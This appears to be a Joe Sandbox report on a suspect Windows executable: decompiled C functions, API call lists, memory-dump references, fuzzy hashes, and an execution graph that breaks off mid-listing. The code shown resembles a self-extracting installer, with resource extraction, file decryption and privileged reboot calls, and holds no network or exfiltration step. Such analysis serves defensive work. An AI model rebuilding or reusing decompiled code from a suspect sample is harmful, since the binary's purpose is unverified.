                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A43680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a4368c
                                                                                                                                                                                                                                            0x00a4368f
                                                                                                                                                                                                                                            0x00a43691
                                                                                                                                                                                                                                            0x00a4369f
                                                                                                                                                                                                                                            0x00a436a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a436ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a436bc
                                                                                                                                                                                                                                            0x00a436bc
                                                                                                                                                                                                                                            0x00a436c0
                                                                                                                                                                                                                                            0x00a436cb
                                                                                                                                                                                                                                            0x00a436c2
                                                                                                                                                                                                                                            0x00a436c4
                                                                                                                                                                                                                                            0x00a436c4
                                                                                                                                                                                                                                            0x00a436da
                                                                                                                                                                                                                                            0x00a436e0
                                                                                                                                                                                                                                            0x00a436e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a436e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a436ba
                                                                                                                                                                                                                                            0x00a436ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A4369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00A436CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: d7327ba416a4b778e5ea3fa1c3d345505ba529deb9e12f2ba3feaac67ec61aaf
                                                                                                                                                                                                                                            • Instruction ID: 8b07dc58f278de5be5418775bf7c751f6302811c354d5c92ba842658b38299e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7327ba416a4b778e5ea3fa1c3d345505ba529deb9e12f2ba3feaac67ec61aaf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101A77B940255B7DF308BEA5C48EEBB67CEBC6B11F010219F915E2180D561C641CA60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A46517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa49a3c; // 0xa40000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a4651f
                                                                                                                                                                                                                                            0x00a4652a
                                                                                                                                                                                                                                            0x00a46534
                                                                                                                                                                                                                                            0x00a4656b
                                                                                                                                                                                                                                            0x00a46577
                                                                                                                                                                                                                                            0x00a4657c
                                                                                                                                                                                                                                            0x00a46536
                                                                                                                                                                                                                                            0x00a4653e
                                                                                                                                                                                                                                            0x00a46542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46544
                                                                                                                                                                                                                                            0x00a46547
                                                                                                                                                                                                                                            0x00a4654c
                                                                                                                                                                                                                                            0x00a46549
                                                                                                                                                                                                                                            0x00a46549
                                                                                                                                                                                                                                            0x00a46549
                                                                                                                                                                                                                                            0x00a4655e
                                                                                                                                                                                                                                            0x00a46560
                                                                                                                                                                                                                                            0x00a46569
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46569
                                                                                                                                                                                                                                            0x00a46542
                                                                                                                                                                                                                                            0x00a46587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0240d38390c349cd17f43e2edeb90968a9654760a31163063c5de4c94bddd342
                                                                                                                                                                                                                                            • Instruction ID: d543f359ecb57667d8038c28bcfe02260f113b5ba690f712bd5626594c11c5f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0240d38390c349cd17f43e2edeb90968a9654760a31163063c5de4c94bddd342
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5301267A140205BBDB109FA99C08EBB7A6CEBCB361F000225FE04A3150D7728C1186A3
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A465E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a465e8
                                                                                                                                                                                                                                            0x00a465ed
                                                                                                                                                                                                                                            0x00a465ef
                                                                                                                                                                                                                                            0x00a465f2
                                                                                                                                                                                                                                            0x00a465f4
                                                                                                                                                                                                                                            0x00a465f4
                                                                                                                                                                                                                                            0x00a465f6
                                                                                                                                                                                                                                            0x00a465f7
                                                                                                                                                                                                                                            0x00a46608
                                                                                                                                                                                                                                            0x00a46611
                                                                                                                                                                                                                                            0x00a46618
                                                                                                                                                                                                                                            0x00a4661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4660e
                                                                                                                                                                                                                                            0x00a46623
                                                                                                                                                                                                                                            0x00a46625
                                                                                                                                                                                                                                            0x00a4663b
                                                                                                                                                                                                                                            0x00a4663b
                                                                                                                                                                                                                                            0x00a4663d
                                                                                                                                                                                                                                            0x00a46641
                                                                                                                                                                                                                                            0x00a46610
                                                                                                                                                                                                                                            0x00a46610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46610
                                                                                                                                                                                                                                            0x00a46644
                                                                                                                                                                                                                                            0x00a46647
                                                                                                                                                                                                                                            0x00a46647
                                                                                                                                                                                                                                            0x00a46621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A42B33), ref: 00A46602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A46612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A46629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A46635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 84aee89f9d21a425674aba3859c9f825672066ed7b59e28a8f90edf824669578
                                                                                                                                                                                                                                            • Instruction ID: 0e0e172d40508efcffe1ec23b0ba4965e2d70f50c22f1d472970d193ee3e23b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84aee89f9d21a425674aba3859c9f825672066ed7b59e28a8f90edf824669578
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0283E0041906EE7365B6C8C888BBFF9CCFDB355B2A02AFE49182001D6160D478A63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A469B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa481f8 = E00A46C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A46FBE(2));
                                                                                                                                                                                                                                            				 *0xa488a4 =  *0xa488a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa488a8 =  *0xa488a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa48528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa4851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A47000();
                                                                                                                                                                                                                                            				if( *0xa48000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A47000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A471EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a469b7
                                                                                                                                                                                                                                            0x00a469c2
                                                                                                                                                                                                                                            0x00a469c8
                                                                                                                                                                                                                                            0x00a469cf
                                                                                                                                                                                                                                            0x00a469d8
                                                                                                                                                                                                                                            0x00a469de
                                                                                                                                                                                                                                            0x00a469e4
                                                                                                                                                                                                                                            0x00a469e6
                                                                                                                                                                                                                                            0x00a469ec
                                                                                                                                                                                                                                            0x00a469f2
                                                                                                                                                                                                                                            0x00a469f4
                                                                                                                                                                                                                                            0x00a46a00
                                                                                                                                                                                                                                            0x00a46a07
                                                                                                                                                                                                                                            0x00a46a0d
                                                                                                                                                                                                                                            0x00a46a0e
                                                                                                                                                                                                                                            0x00a46a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A46FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A46FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A469C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A469D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A469E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A46A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 0cfbcad1d288b7bd9dc51e61556adef6b7cd48621ba728baf5058a5705a33a7e
                                                                                                                                                                                                                                            • Instruction ID: 9512756e0cd4a0d83ddbff5a011eb2c0ded4048a53bb35ea61464aa9e8a5aec6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cfbcad1d288b7bd9dc51e61556adef6b7cd48621ba728baf5058a5705a33a7e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0587C1487018FC714EBB4BE0A20C3B60FBC3321B100A09E462862F0CFBF80429A02
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:960
                                                                                                                                                                                                                                            Total number of Limit Nodes:24
                                                                                                                                                                                                                                            execution_graph 3119 327270 _except_handler4_common 3120 3269b0 3121 3269b5 3120->3121 3129 326fbe GetModuleHandleW 3121->3129 3123 3269c1 __set_app_type __p__fmode __p__commode 3124 3269f9 3123->3124 3125 326a02 __setusermatherr 3124->3125 3126 326a0e 3124->3126 3125->3126 3131 3271ef _controlfp 3126->3131 3128 326a13 3130 326fcf 3129->3130 3130->3123 3131->3128 3132 3234f0 3133 323504 3132->3133 3134 3235b8 3132->3134 3133->3134 3135 32351b 3133->3135 3136 3235be GetDesktopWindow 3133->3136 3139 323671 EndDialog 3134->3139 3140 323526 3134->3140 3137 32354f 3135->3137 3138 32351f 3135->3138 3154 3243d0 6 API calls 3136->3154 3137->3140 3143 323559 ResetEvent 3137->3143 3138->3140 3142 32352d TerminateThread EndDialog 3138->3142 3139->3140 3142->3140 3145 3244b9 20 API calls 3143->3145 3149 323581 3145->3149 3146 3235e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147 32361d SetWindowTextA CreateThread 3146->3147 3147->3140 3148 323646 3147->3148 3150 3244b9 20 API calls 3148->3150 3151 32359b SetEvent 3149->3151 3152 32358a SetEvent 3149->3152 3150->3134 3153 323680 4 API calls 3151->3153 3152->3140 3153->3134 3155 324463 SetWindowPos 3154->3155 3157 326ce0 4 API calls 3155->3157 3158 3235d6 3157->3158 3158->3146 3158->3147 3159 326ef0 3160 326f2d 3159->3160 3162 326f02 3159->3162 3161 326f27 ?terminate@ 3161->3160 3162->3160 3162->3161 2196 324ca0 GlobalAlloc 2197 326a60 2214 327155 2197->2214 2199 326a65 2200 326a76 GetStartupInfoW 2199->2200 2201 326a93 2200->2201 2202 326aa8 2201->2202 2203 326aaf Sleep 2201->2203 2204 326ac7 _amsg_exit 2202->2204 2206 326ad1 2202->2206 2203->2201 2204->2206 2205 326b13 _initterm 2207 326b2e __IsNonwritableInCurrentImage 2205->2207 2206->2205 2206->2207 2208 326af4 2206->2208 2209 326bd6 _ismbblead 2207->2209 2210 326c1e 2207->2210 2213 326bbe exit 2207->2213 2219 322bfb GetVersion 2207->2219 2209->2207 2210->2208 2211 326c27 _cexit 2210->2211 2211->2208 2213->2207 2215 32717a 2214->2215 2216 32717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 3271e2 2215->2217 2218 3271cd 2216->2218 2217->2199 2218->2217 2220 322c50 2219->2220 2221 322c0f 2219->2221 2236 322caa memset memset memset 2220->2236 2221->2220 2222 322c13 GetModuleHandleW 2221->2222 2222->2220 2225 322c22 GetProcAddress 2222->2225 2225->2220 2233 322c34 2225->2233 2226 322c8e 2228 322c97 CloseHandle 2226->2228 2229 322c9e 2226->2229 2228->2229 2229->2207 2233->2220 2234 322c89 2330 321f90 2234->2330 2347 32468f FindResourceA SizeofResource 2236->2347 2239 322ef3 2242 3244b9 20 API calls 2239->2242 2240 322d2d CreateEventA SetEvent 2241 32468f 7 API calls 2240->2241 2243 322d57 2241->2243 2244 322d6e 2242->2244 2245 322d5b 2243->2245 2247 322e1f 2243->2247 2250 32468f 7 API calls 2243->2250 2352 326ce0 2244->2352 2357 3244b9 2245->2357 2386 325c9e 2247->2386 2249 322c62 2249->2226 2277 322f1d 2249->2277 2253 322d9f 2250->2253 2253->2245 2256 322da3 CreateMutexA 2253->2256 2254 322e30 2254->2239 2255 322e3a 2257 322e52 FindResourceA 2255->2257 2258 322e43 2255->2258 2256->2247 2259 322dbd GetLastError 2256->2259 2262 322e64 LoadResource 2257->2262 2263 322e6e 2257->2263 2412 322390 2258->2412 2259->2247 2261 322dca 2259->2261 2265 322dd5 2261->2265 2266 322dea 2261->2266 2262->2263 2264 322e4d 2263->2264 2427 3236ee GetVersionExA 2263->2427 2264->2244 2267 3244b9 20 API calls 2265->2267 2268 3244b9 20 API calls 2266->2268 2269 322de8 2267->2269 2270 322dff 2268->2270 2272 322e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 322f3f 2277->2278 2279 322f6c 2277->2279 2281 322f5f 2278->2281 2552 3251e5 2278->2552 2571 325164 2279->2571 2699 323a3f 2281->2699 2283 322f71 2313 32303c 2283->2313 2584 3255a0 2283->2584 2289 326ce0 4 API calls 2291 322c6b 2289->2291 2290 322f86 GetSystemDirectoryA 2292 32658a CharPrevA 2290->2292 2317 3252b6 2291->2317 2293 322fab LoadLibraryA 2292->2293 2294 322fc0 GetProcAddress 2293->2294 2295 322ff7 FreeLibrary 2293->2295 2294->2295 2298 322fd6 DecryptFileA 2294->2298 2296 323006 2295->2296 2297 323017 SetCurrentDirectoryA 2295->2297 2296->2297 2632 32621e GetWindowsDirectoryA 2296->2632 2299 323026 2297->2299 2301 323054 2297->2301 2298->2295 2309 322ff0 2298->2309 2303 3244b9 20 API calls 2299->2303 2300 323061 2306 32307a 2300->2306 2300->2313 2651 32256d 2300->2651 2301->2300 2642 323b26 2301->2642 2308 323037 2303->2308 2311 323098 2306->2311 2662 323ba2 2306->2662 2718 326285 GetLastError 2308->2718 2309->2295 2311->2313 2315 3230af 2311->2315 2313->2289 2720 324169 2315->2720 2318 3252d6 2317->2318 2325 325316 2317->2325 2320 325300 LocalFree LocalFree 2318->2320 2322 3252eb SetFileAttributesA DeleteFileA 2318->2322 2319 32538c 2321 326ce0 4 API calls 2319->2321 2320->2318 2320->2325 2324 322c72 2321->2324 2322->2320 2324->2226 2324->2234 2326 32535e SetCurrentDirectoryA 2325->2326 2327 3265e8 4 API calls 2325->2327 2329 325374 2325->2329 2328 322390 13 API calls 2326->2328 2327->2326 2328->2329 2329->2319 3050 321fe1 2329->3050 2331 321f9f 2330->2331 2332 321f9a 2330->2332 2334 321fc0 2331->2334 2335 3244b9 20 API calls 2331->2335 2339 321fd9 2331->2339 2333 321ea7 15 API calls 2332->2333 2333->2331 2336 321ee2 GetCurrentProcess OpenProcessToken 2334->2336 2337 321fcf ExitWindowsEx 2334->2337 2334->2339 2335->2334 2340 321f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2340 2341 321f0e 2336->2341 2337->2339 2339->2226 2340->2341 2342 321f6b ExitWindowsEx 2340->2342 2344 3244b9 20 API calls 2341->2344 2342->2341 2343 321f1f 2342->2343 2345 326ce0 4 API calls 2343->2345 2344->2343 2346 321f8c 2345->2346 2346->2226 2348 3246b6 2347->2348 2349 322d1a 2347->2349 2348->2349 2350 3246be FindResourceA LoadResource LockResource 2348->2350 2349->2239 2349->2240 2350->2349 2351 3246df memcpy_s FreeResource 2350->2351 2351->2349 2353 326ceb 2352->2353 2354 326ce8 2352->2354 2469 326cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2353->2469 2354->2249 2356 326e26 2356->2249 2358 3244fe LoadStringA 2357->2358 2370 32455a 2357->2370 2359 324562 2358->2359 2360 324527 2358->2360 2365 3245c9 2359->2365 2371 32457e LocalAlloc 2359->2371 2361 32681f 10 API calls 2360->2361 2363 32452c 2361->2363 2362 326ce0 4 API calls 2364 324689 2362->2364 2372 324536 MessageBoxA 2363->2372 2482 3267c9 2363->2482 2364->2244 2367 324607 LocalAlloc 2365->2367 2368 3245cd LocalAlloc 2365->2368 2367->2370 2380 3245c4 2367->2380 2368->2370 2376 3245f3 2368->2376 2370->2362 2371->2370 2378 3245af 2371->2378 2372->2370 2374 32462d MessageBeep 2470 32681f 2374->2470 2379 32171e _vsnprintf 2376->2379 2488 32171e 2378->2488 2379->2380 2380->2374 2383 324645 MessageBoxA LocalFree 2383->2370 2384 3267c9 EnumResourceLanguagesA 2384->2383 2393 325e17 2386->2393 2410 325cc3 2386->2410 2387 325dd0 2391 325dec GetModuleFileNameA 2387->2391 2387->2393 2388 326ce0 4 API calls 2389 322e2c 2388->2389 2389->2254 2389->2255 2390 325ced CharNextA 2390->2410 2392 325e0a 2391->2392 2391->2393 2498 3266c8 2392->2498 2393->2388 2395 326218 2507 326e2a 2395->2507 2398 325e36 CharUpperA 2399 3261d0 2398->2399 2398->2410 2400 3244b9 20 API calls 2399->2400 2401 3261e7 2400->2401 2402 3261f0 CloseHandle 2401->2402 2403 3261f7 ExitProcess 2401->2403 2402->2403 2404 325f9f CharUpperA 2404->2410 2405 325f59 CompareStringA 2405->2410 2406 326003 CharUpperA 2406->2410 2407 32667f IsDBCSLeadByte CharNextA 2407->2410 2408 325edc CharUpperA 2408->2410 2409 3260a2 CharUpperA 2409->2410 2410->2387 2410->2390 2410->2393 2410->2395 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2503 32658a 2410->2503 2413 3224cb 2412->2413 2416 3223b9 2412->2416 2414 326ce0 4 API calls 2413->2414 2415 3224dc 2414->2415 2415->2264 2416->2413 2417 3223e9 FindFirstFileA 2416->2417 2417->2413 2425 322407 2417->2425 2418 322421 lstrcmpA 2420 322431 lstrcmpA 2418->2420 